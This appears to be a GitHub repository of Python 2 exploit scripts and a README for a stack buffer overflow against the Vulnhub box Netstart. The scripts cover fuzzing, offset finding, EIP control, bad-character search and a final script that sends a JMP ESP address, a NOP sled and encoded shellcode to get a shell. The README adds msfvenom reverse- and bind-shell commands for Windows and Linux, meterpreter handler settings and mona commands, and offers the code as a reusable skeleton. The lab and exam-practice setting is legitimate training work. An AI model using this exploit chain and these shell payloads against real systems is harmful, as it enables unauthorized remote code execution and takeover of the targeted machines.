├── 01_fuzzingCrashingProgram.py ├── 02_findingtheOffset.py ├── 03_overwritingEIP.py ├── 04_findingBadChars.py ├── 04_findingBadChars_netstart.py ├── 05_genshell.py ├── LICENSE └── README.md /01_fuzzingCrashingProgram.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #once the program crashes in Windows, CLOSE it manually or this PROGRAM may keep running forever 4 | 5 | import sys,socket 6 | from time import sleep 7 | 8 | buffer = "A"*100 9 | ip = '192.168.10.51' 10 | port = 2371 11 | while True: 12 | try: 13 | print ("Sending buffer of length " + str(len(buffer)) ) 14 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 15 | s.settimeout(2) 16 | res = s.connect_ex((ip,port)) 17 | 18 | if res == 0: 19 | print("The Port is open\n") 20 | 21 | else: 22 | print("The Port is closed\n") 23 | s.close() 24 | sys.exit() 25 | 26 | 27 | 28 | res = s.connect((ip,port)) 29 | buffer = buffer + "A"*250 30 | s.send((buffer)) 31 | s.close() 32 | sleep(2) 33 | 34 | 35 | except: 36 | print ("Program crashed at %s bytes" %str(len(buffer))) 37 | sys.exit() 38 | -------------------------------------------------------------------------------- /02_findingtheOffset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | #msf-pattern_create -l 1850 [vulnhub netstart by foxlox] 6 | ip = '192.168.10.51' 7 | port = 2371 8 | 9 | offset = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj" 10 | 11 | try: 12 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 13 | s.connect((ip,port)) 14 | s.send((offset)) 15 | s.close() 16 | 17 | 
except: 18 | print("Error connecting to server") 19 | sys.exit() 20 | -------------------------------------------------------------------------------- /03_overwritingEIP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | shellcode = 'A'*1702 + 'B'*4 #if done correctly, you should see the EIP filled with 42424242 6 | 7 | ip = '192.168.10.51' 8 | port = 2371 9 | 10 | try: 11 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 12 | s.connect((ip,port)) 13 | s.send((shellcode)) 14 | s.close() 15 | 16 | except: 17 | print("Error connecting to server") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /04_findingBadChars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ip = '192.168.10.51' 6 | port = 2371 7 | 8 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 9 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 10 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 11 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 13 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 14 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 15 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 16 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 17 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 18 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 19 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 20 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 21 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 22 | 
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 23 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 24 | 25 | 26 | shellcode = 'A'*1702 + 'B'*4 + badchars 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect((ip,port)) 31 | s.send((shellcode)) 32 | s.close() 33 | 34 | except: 35 | print("Error connecting to server") 36 | sys.exit() 37 | -------------------------------------------------------------------------------- /04_findingBadChars_netstart.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ''' 6 | ### in immunity follow ESP in DUMP and see manally for something not in sequence### 7 | keep removing the badchars from badchars array and keep resending unless you reach to FF 8 | 9 | 1st badchar = \x2d 10 | 2nd badchar = \x2e 11 | 3rd badchar = \x46 12 | 4th badchar = \x47 13 | 5th badchar = \x59 14 | 6th bachar = \x5e 15 | 7th badchar = \x60 16 | ''' 17 | ip = '192.168.10.51' 18 | port = 2371 19 | 20 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 21 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 22 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2f\x30" 23 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 24 | "\x41\x42\x43\x44\x45\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 25 | "\x51\x52\x53\x54\x55\x56\x57\x58\x5a\x5b\x5c\x5d\x5f" 26 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 27 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 28 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 29 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 30 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 31 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 32 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 33 | 
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 34 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 35 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 36 | 37 | 38 | 39 | shellcode = 'A'*1702 + 'B'*4 + badchars 40 | 41 | try: 42 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 43 | s.connect((ip,port)) 44 | s.send((shellcode)) 45 | s.close() 46 | 47 | except: 48 | print("Error connecting to server") 49 | sys.exit() 50 | -------------------------------------------------------------------------------- /05_genshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import sys,socket 4 | 5 | ''' 6 | #gets reverse shell back on windows 07, successfully 7 | #Kali port = 1234 8 | #Kali IP = 192.168.10.6 9 | 10 | overflow = ("\x33\xc9\xb1\x51\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" 11 | "\xf3\xca\xde\x83\xeb\xfc\xe2\xf4\xe5\x1b\x48\xde\x19\xf3\xaa" 12 | "\x57\xfc\xc2\x0a\xba\x92\xa3\xfa\x55\x4b\xff\x41\x8c\x0d\x78" 13 | "\xb8\xf6\x16\x44\x80\xf8\x28\x0c\x66\xe2\x78\x8f\xc8\xf2\x39" 14 | "\x32\x05\xd3\x18\x34\x28\x2c\x4b\xa4\x41\x8c\x09\x78\x80\xe2" 15 | "\x92\xbf\xdb\xa6\xfa\xbb\xcb\x0f\x48\x78\x93\xfe\x18\x20\x41" 16 | "\x97\x01\x10\xf0\x97\x92\xc7\x41\xdf\xcf\xc2\x35\x72\xd8\x3c" 17 | "\xc7\xdf\xde\xcb\x2a\xab\xef\xf0\xb7\x26\x22\x8e\xee\xab\xfd" 18 | "\xab\x41\x86\x3d\xf2\x19\xb8\x92\xff\x81\x55\x41\xef\xcb\x0d" 19 | "\x92\xf7\x41\xdf\xc9\x7a\x8e\xfa\x3d\xa8\x91\xbf\x40\xa9\x9b" 20 | "\x21\xf9\xac\x95\x84\x92\xe1\x21\x53\x44\x9b\xf9\xec\x19\xf3" 21 | "\xa2\xa9\x6a\xc1\x95\x8a\x71\xbf\xbd\xf8\x1e\x0c\x1f\x66\x89" 22 | "\xf2\xca\xde\x30\x37\x9e\x8e\x71\xda\x4a\xb5\x19\x0c\x1f\x8e" 23 | "\x49\xa3\x9a\x9e\x49\xb3\x9a\xb6\xf3\xfc\x15\x3e\xe6\x26\x5d" 24 | "\xb4\x1c\x9b\x0a\x76\x13\xf5\xa2\xdc\x19\xf7\x18\x57\xff\x99" 25 | "\xda\x88\x4e\x9b\x53\x7b\x6d\x92\x35\x0b\x9c\x33\xbe\xd2\xe6" 26 | 
"\xbd\xc2\xab\xf5\x9b\x3a\x6b\xbb\xa5\x35\x0b\x71\x90\xa7\xba" 27 | "\x19\x7a\x29\x89\x4e\xa4\xfb\x28\x73\xe1\x93\x88\xfb\x0e\xac" 28 | "\x19\x5d\xd7\xf6\xdf\x18\x7e\x8e\xfa\x09\x35\xca\x9a\x4d\xa3" 29 | "\x9c\x88\x4f\xb5\x9c\x90\x4f\xa5\x99\x88\x71\x8a\x06\xe1\x9f" 30 | "\x0c\x1f\x57\xf9\xbd\x9c\x98\xe6\xc3\xa2\xd6\x9e\xee\xaa\x21" 31 | "\xcc\x48\x2a\xc3\x33\xf9\xa2\x78\x8c\x4e\x57\x21\xcc\xcf\xcc" 32 | "\xa2\x13\x73\x31\x3e\x6c\xf6\x71\x99\x0a\x81\xa5\xb4\x19\xa0" 33 | "\x35\x0b") 34 | ''' 35 | ip = '192.168.10.51' 36 | port = 2371 37 | 38 | overflow = ("\x31\xc9\xb1\x11\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79" 39 | "\xf2\x7c\x77\x83\xeb\xfc\xe2\xf4\x48\x29\x8b\x94\x2a\xb1\x2f" 40 | "\x1d\x7b\x7b\x9d\xc7\x1f\x3f\xfc\xe4\x20\x42\x43\xba\xf9\xbb" 41 | "\x05\x8e\x11\x32\xd4\x7d\x7f\x9a\x7e\x77\x7d\x20\xf5\x96\xc9" 42 | "\x94\x2c\x26\x2a\x41\x7f\xfe\x98\x3f\xfc\x25\x11\x9c\x53\x04" 43 | "\x11\x9a\x53\x58\x1b\x9b\xf5\x94\x2b\xa1\xf5\x96\xc9\xf9\xb1" 44 | "\xf7") 45 | 46 | #JMP01 = 0x 625012b8 47 | #JMP02 = 0x 625012c5 48 | shellcode = 'A'*1702 + "\xb8\x12\x50\x62" +"\x90"*16 + overflow 49 | 50 | try: 51 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 52 | s.connect((ip,port)) 53 | s.send((shellcode)) 54 | s.close() 55 | 56 | except: 57 | print("Error connecting to server") 58 | sys.exit() 59 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 F-Masood 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following 
conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Exploiting Stack-based Buffer Overflow 2 | Python 2 based buffer-overflow scripts I developed while doing the box **Netstart** by **Foxlox** on **Vulnhub**. 3 | 4 | **Update Jan 2022**: The following skeleton code worked in my eCPPT, OSCP etc. with small modifications, e.g. adding '\n' when sending a command. ;-) 5 | 6 | **Walkthrough** link: https://grumpygeekwrites.wordpress.com/2020/12/07/netstart-vulnhub-walk-through-tutorial/ 7 | 8 | Also works with: 9 | > 1. Brainpan Vulnhub (tested) 10 | > 1. Dostackbufferoverflowgood (tested, remember to add "\n" at the end of the buffer) 11 | > 1. Offensive Security PG Practice box 12 | > 1. School Vulnhub (tested, but the msf-pattern_create command needs to be modified) 13 | 14 | Important steps to remember are: 15 | > 1. Spiking. 16 | > 1. Fuzzing / crashing the program with some bytes. 17 | > 1. Noting down how many bytes that took. 18 | > 1. Creating a unique **pattern** of that length via **MSF** and sending it to the program. 19 | > 1. Crashing the program again and noting down the value of **EIP**. 20 | > 1. Giving the EIP value to MSF **offset** to find the exact crash point. 21 | > 1. 
Controlling **EIP**, to check whether our EIP is filled with the four B's (EIP = 42 42 42 42) 22 | > 1. Finding badchars, [follow **ESP in dump**] removing each one from the BadChars array and resending until none remain. We should see neat and clean output from 0000-FFFF. 23 | > 1. Finding the JMP address in a ".dll" using mona. 24 | > 1. Use command01= ```!mona modules``` --- command02= ```!mona find -s '\xff\xe4' -m login_support.dll```. Note down all the addresses. 25 | > 1. If mona fails, manually use the SEARCH command and look for a **JMP ESP** address. 26 | > 1. If there is no module (.dll) file use this ```command03 = !mona jmp -r esp -cpb "\x00"``` 27 | > 1. If there is no module (.dll) file use this PUSH ESP command04 = ```!mona find -s "\x54\xc3" -m bufferoverflow.exe``` 28 | > 1. Generating a SHELL payload using MSF Venom; remember to select the proper architecture and to specify the BADCHARS we found. 29 | > 1. We should now get a shell; our PAYLOAD would be something like ---> **A*(offset value) + JMP address in little-endian format + 8/16/32 NOPs + shellcode** 30 | 31 | **What it means** 32 | > 1. **RHOST = remote host -> Kali Box IP** 33 | > 1. **RPORT = remote port -> Kali Box Port** 34 | > 1. **LPORT = local port --> BoF box port (used for BindShell)** 35 | > 36 | **Generate Shell for Windows**: 37 | > 1. ```msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.100 LPORT=1234 EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x2d\x2e\x46\x47\x59\x5e\x60" -f c``` 38 | > 1. ```msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/fnstenv_mov -b "\x04\xA0" [vulnhub school]``` 39 | > 1. ```msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.110 LPORT=80 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackme BoF 5]``` 40 | > 1. ```msfvenom -p windows/shell_bind_tcp RHOST=192.168.10.100 LPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackme BoF 5]``` 41 | 42 | **Generate Bind Shell for Windows w/meterpreter**: 43 | > 1. 
```use exploit/multi/handler``` 44 | > 1. ```set payload windows/meterpreter/bind_tcp``` 45 | > 1. ```set EXITFUNC thread``` 46 | > 1. ```set LPORT 12345``` 47 | > 1. ```set RHOST 192.168.10.100``` 48 | > 1. ```msfvenom -p windows/meterpreter/bind_tcp RHOST=192.168.10.100 LPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackme BoF 5]``` 49 | 50 | **Generate Reverse Shell for Windows w/meterpreter**: 51 | > 1. ```msfvenom -p windows/meterpreter/reverse_tcp RHOST=192.168.10.110 RPORT=12345 EXITFUNC=thread -b "\x00\x16\x2F\xF4\xFD" -f c [tryhackme BoF 5]``` 52 | 53 | **Generate reverse shell for Linux**: 54 | > 1. msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.10.6 LPORT=1234 EXITFUNC=thread -b "\x00\x2d\x2e\x46\x47\x59\x5e\x60" -f c 55 | > 1. from OSPG -> msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.118.5 LPORT=2121 -f py -b "\x00" EXITFUNC=thread 56 | 57 | **For School (Vulnhub), where msf-pattern_create fails**: 58 | > 1. ```msf-pattern_create -l 2100 -s ABCDEFGHIKL,alienum,123456789``` 59 | > 1. ```msf-pattern_offset -q 4C35614C -l 2100 -s ABCDEFGHIKL,alienum,123456789``` 60 | --------------------------------------------------------------------------------